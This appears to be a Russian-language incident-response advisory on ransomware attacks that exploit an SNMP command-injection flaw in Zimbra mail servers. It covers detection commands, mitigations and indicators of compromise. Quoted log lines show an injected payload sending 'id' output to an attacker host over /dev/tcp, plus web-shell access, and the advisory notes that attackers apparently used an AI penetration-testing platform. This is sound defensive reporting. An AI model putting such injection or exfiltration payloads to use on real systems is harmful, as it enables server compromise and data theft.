Ваш сервер Zimbra под угрозой

Недавно наша команда по реагированию на инциденты (PT ESC IR) столкнулась с новой атакой ransomware-группировок на почтовые серверы Zimbra с использованием уязвимости CVE-2026-73570 и шифровальщика TargetZimbra. По информации из открытых источников аналогичные атаки массово фиксируются на серверах Zimbra с середины августа.
Дисклеймер: если вы используете неактуальную версию ПО Zimbra и не обнаружили на своем почтовом сервере приведенных ниже индикаторов компрометации конкретной кампании шифровальщика TargetZimbra, то это не значит, что ваш сервер гарантированно не скомпрометирован. Уязвимость CVE-2026-73570 может использоваться другими злоумышленниками, например, для установки майнеров, а также APT-группировками, нацеленными на компрометацию инфраструктуры всей организации.
Уязвимость CVE-2026-73570 позволяет атакующему осуществлять внедрение и выполнение вредоносных команд на почтовом сервере Zimbra с правами пользователя zimbra без предварительной аутентификации в результате недостаточной санации ввода в компоненте SNMP.
Для успешной эксплуатации на почтовом сервере должна быть установлена версия ПО Zimbra Collaboration Suite ниже 10.1.20, а также установлен пакет zimbra-snmp и включены SNMP-уведомления. Уязвимость эксплуатируется в результате отправки специально сформированного SMTP-запроса через порты 25, 465 или 587.
Сценарий атаки
В результате эксплуатации уязвимости CVE-2026-73570 злоумышленники создают на почтовом сервере файл
/opt/zimbra/jetty_base/webapps/zimbra/public/version.txt(илиversions.txt), содержащий сведения об используемой на сервере версии ПО Zimbra. Созданный файл является для атакующего индикатором успешной эксплуатации уязвимости.На следующем этапе злоумышленники загружают JSP-шеллы в директорию почтового сервера
/opt/zimbra/jetty_base/webapps/zimbra/public/. Кроме того, зафиксировано внедрение на сервер хакерского инструмента Gsocket. Ранее мы уже писали подробную заметку о том, как детектировать инструмент Gsocket.Далее злоумышленники загружают шифровальщик TargetZimbra, написанный на языке Go. После запуска указанный вредоносный модуль шифрует файлы с использованием алгоритма ChaCha20 в каталоге /opt/zimbra/ и его подкаталогах.
После шифрования файлов шифровальщик изменяет их расширение на
.elock, а также создает в зашифрованных директориях файлы!README_RECOVER.txt, содержащие контактную информацию и сведения для выкупа расшифровки данных. По окончании работы вредоносный модуль TargetZimbra удаляет себя из системы.
Как проверить ваш почтовый сервер Zimbra на наличие признаков компрометации
В основном системном журнале почтовой службы
/var/log/maillogзаписи, содержащие подстрокуchanged from stopped to, перед которой записана shell-команда или иная подозрительная нагрузка, являются признаком эксплуатации уязвимости CVE-2026-73570.Для поиска вредоносных событий на вашем сервере может использоваться следующая команда:
grep "changed from stopped to" /var/log/maillogПример выполнения команды
idи передачи ее вывода на С2-сервер злоумышленников:Aug 29 14:23:46 zimbra-server postfix/submission/smtpd[108829]: improper command pipelining after EHLO from unknown[[REDACTED_IP_1]]: : Service status change: h ;id>/dev/tcp/[REDACTED_IP_2]/1337; changed from stopped to running\r\nQUIT\r\n - время эксплуатации уязвимости: 29 августа 2026 года в 14:23:46; - [REDACTED_IP_1]: С2 адрес злоумышленников; - id>/dev/tcp/[REDACTED_IP_2]/1337: команда для выполнения на системе.Наличие нестандартных JSP-файлов, которые не относятся к ПО Zimbra и были созданы либо изменены за последние месяцы в каталоге
/opt/zimbra/jetty_base/webapps/zimbra/и во всех его подкаталогах. Характерными признаками вредоносных JSP-файлов являются наличие обфусцированного кода, закодированных строк, а также нетипичная обработка GET- и POST-запросов.Для поиска недавно созданных или измененных JSP-файлов на вашем сервере могут использоваться следующие команды:
find /opt/zimbra/jetty_base/webapps/zimbra/ -type f -iname '*.jsp' -newermt '2026-07-01'(поиск по дате изменения файла)find /opt/zimbra/jetty_base/webapps/zimbra/ -type f -iname '*.jsp' -newerBt '2026-07-01'(поиск по дате создания файла)Обратите внимание, что не все файловые системы Linux хранят дату создания файла. Если система не отслеживает указанную метку, то команда find выдаст ошибку. Также проверьте сервер антивирусными средствами.
В журнале доступа WEB-сервера (например, для WEB-сервера Nginx стандартное расположение
/var/log/nginx/access.log) записи об обращении к нестандартным JSP-файлам (с кодом ответа 200), расположенным в каталоге/opt/zimbra/jetty_base/webapps/zimbra/и во всех его подкаталогах (в частности, часто используемый каталог/opt/zimbra/jetty_base/webapps/zimbra/public/), могут свидетельствовать о наличии WEB-shell'ов на почтовом сервере. Если WEB-shell получает команды через GET-запрос, то передаваемая команда будет отображена в журнале.Пример вывода результата выполнения команды
lsв браузер атакующего:
[REDACTED_IP] - - [29/Aug/2026:12:41:35 +0000] GET /public/bzng.jsp?p=ls HTTP/1.0 200 443 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 34889
- [REDACTED_IP]: С2 адрес злоумышленников;
- [29/Aug/2026:12:41:35 +0000]: время обращения к WEB-shell;
- public/bzng.jsp: расположение WEB-shell;
- ls: выполняемая команда.Кроме того, исследуя сетевую инфраструктуру злоумышленников, мы обнаружили WEB-панели платформы CyberStrikeAI, размещенные на нескольких С2-серверах (скриншоты 1 и 2).

CyberStrikeAI — открытая платформа, предназначенная для автоматизации тестирования на проникновение с использованием ИИ.

Наличие работающей платформы на С2-сервере злоумышленников может указывать на ее применение как на отдельных этапах атаки (например, первоначальной компрометации сервера), так и в рамках всего инцидента.
Наши рекомендации
Обновить ПО Zimbra на вашем почтовом сервере до актуальной версии. В идеале также переустановить ОС сервера с переносом всех почтовых данных.
В случае невозможности быстрого обновления ПО временным решением может быть отключение SNMP-уведомлений и удаление пакета
zimbra-snmp.Кроме того, проверьте почтовый сервер антивирусными средствами, а также вручную посмотрите нестандартные JSP-файлы, созданные за последние месяцы в служебных каталогах Zimbra.
Индикаторы компрометации
Файловые индикаторы
/opt/zimbra/jetty_base/webapps/zimbra/public/version.txt или versions.txt — файл, содержащий версию ПО Zimbra;
/opt/zimbra/jetty_base/webapps/zimbra/public/[Filename].jsp — WEB-shell;
/opt/zimbra/log/defunct — Gsocket;
elockc[a-z] (например, elockcl) — шифровальщик;
runloop.sh — скрипт, создаваемый шифровальщиком;
!README_RECOVER.txt — записка злоумышленников;
*.elock — файлы с расширением .elock.
Сетевые индикаторы
135.136.63.63
139.28.49.138
146.70.169.246
193.24.211.91
193.32.126.168
31.177.110.136
37.32.73.156
64.62.156.162
64.62.156.222
64.62.156.94
88.214.21.183
89.116.171.182
89.117.94.35Gsocket
*.gs.thc.org
gsocket.io
152.53.173.29
152.53.173.30
176.65.149.52
212.132.98.170
217.154.53.116
217.154.53.187
45.90.4.121
45.90.4.128
51.91.190.241
51.91.190.242KioskNews shows a cleaned-up reading view extracted from the publisher’s page — the original always lives on their site, not ours.